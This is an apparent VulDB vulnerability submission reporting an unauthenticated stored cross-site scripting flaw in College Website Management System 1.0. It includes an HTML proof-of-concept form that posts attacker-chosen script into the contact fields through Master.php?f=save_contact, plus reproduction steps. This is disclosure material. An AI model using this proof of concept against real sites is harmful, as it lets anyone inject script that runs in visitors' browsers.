| 제목 | College Website Management System 1.0 - Cross-site Scripting Stored |
|---|
| 설명 | # Exploit Title: College Website Management System 1.0 - Cross-site Scripting Stored
# Date: 13/03/2022
# Exploit Author: Mr Empy
# Software Link: https://www.sourcecodester.com/php/15203/college-website-content-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Linux
Title:
================
College Website Management System 1.0 - Cross-site Scripting Stored
Summary:
================
The College Website Management System application is vulnerable to cross-site scripting (XSS) exploitation. Because of the lack of validation in authentication when exchanging contact information, it is possible to inject arbitrary javascript code causing a manipulation of browser features on the client side.
Severity Level:
================
7.5 (High)
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
Affected Product:
================
College Website Management System v1.0
Steps to Reproduce:
================
1. Create an HTML file and paste the following code:
<html>
<title>CWMS XSS PoC</title>
<center>
<h1>CWMS XSS PoC</h1>
<form action="http://<TARGET>/cwms/classes/Master.php?f=save_contact" method="POST">
<p>School address<input type="text" name="school_address" placeholder="Inject XSS payload here"></input></p>
<p>Telephone<input type="text" name="school_tel_no" placeholder="Inject XSS payload here"></input></p>
<p>Email<input type="text" name="school_email" placeholder="Inject XSS payload here"></input></p>
<input type="text" name="map_coords" value="10.676033878642961, 122.9520835825518" hidden></input>
<button>Submit</button>
</form>
</center>
</html>
Add your target to "action" in the form and open that file using a browser.
2. Add a javascript code to one of the fields and send the request.
3. Go to http://target.com/cwms/?p=contact_us and you will find your changes made.
Note: the application owner has already been informed about the failure on March 13, 2022, I await a response. |
|---|
| 원천 | ⚠️ https://www.sourcecodester.com/php/15203/college-website-content-management-system-phpoop-free-source-code.ht |
|---|
| 사용자 | mrempy (UID 24379) |
|---|
| 제출 | 2022. 03. 13. PM 06:16 (4 연령 ago) |
|---|
| 모더레이션 | 2022. 03. 13. PM 08:29 (2 hours later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 194846 [College Website Management System 1.0 Contact Master.php?f=save_contact 크로스 사이트 스크립팅] |
|---|
| 포인트들 | 20 |
|---|